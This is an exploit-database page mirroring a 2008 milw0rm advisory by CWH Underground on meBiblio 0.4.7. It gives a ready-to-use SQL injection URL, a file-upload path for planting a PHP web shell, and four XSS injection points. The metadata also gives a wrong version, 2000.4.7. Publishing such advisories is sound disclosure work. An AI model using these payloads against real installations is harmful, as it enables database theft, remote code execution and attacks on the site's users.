meBiblio 0.4.7 Remote SQL Injection/ Arbitrary File Upload Exploit / XSS Vulnerability

vendor:

meBiblio

by:

CWH Underground

8.8

CVSS

HIGH

SQL Injection/ Arbitrary File Upload/ XSS

89, 95, 79

CWE

Product Name: meBiblio

Affected Version From: 2000.4.7

Affected Version To: 2000.4.7

Patch Exists: NO

Related CWE: N/A

CPE: a:mebiblio:mebiblio:0.4.7

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

meBiblio 0.4.7 Remote SQL Injection/ Arbitrary File Upload Exploit / XSS Vulnerability

meBiblio 0.4.7 is vulnerable to SQL Injection, Arbitrary File Upload and XSS. An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable application. An attacker can also upload a malicious file to the vulnerable application and execute it. An attacker can also inject malicious JavaScript code into the vulnerable application.

Mitigation:

Input validation should be used to prevent SQL Injection, Arbitrary File Upload and XSS attacks. The application should also be configured to only allow trusted users to upload files.

Source

Exploit-DB raw data:

========================================================================================
 meBiblio 0.4.7 Remote SQL Injection/ Arbitrary File Upload Exploit / XSS Vulnerability
========================================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE   : 1 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : meBiblio
 VERSION     : 0.4.7 (Lastest Version)
 VENDOR      : http://mebiblio.sourceforge.net/ 
 DOWNLOAD    : http://downloads.sourceforge.net/mebiblio
#####################################################

---SQL Injection Exploit---

http://[target]/[path]/admin/journal_change_mask.inc.php?JID=1%20union%20select%201,PACS_description,1,1%20FROM%20pacs%20where%20PACS_ID=2

** You will found PACS_description in Journal Long Name's Box **


---Arbitrary File Upload Exploit---

[Files Directory must existed]

Upload Path: http://[target]/[path]/upload/uploader.html

Shell Script: http://[target]/[path]/files/evil.php


---Multiple Remote XSS Exploit---

[+]dbadd.inc.php
[+]add_journal_mask.inc.php
[+]insert_mask.inc.php
[+]search_mask.inc.php

Example:
     
http://[target]/[path]/dbadd.inc.php?sql=<XSS>
http://[target]/[path]/add_journal_mask.inc.php?InsertJournal=<XSS>
http://[target]/[path]/insert_mask.inc.php?InsertBibliography=<XSS>
http://[target]/[path]/search_mask.inc.php?LabelYear=<XSS>


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-01]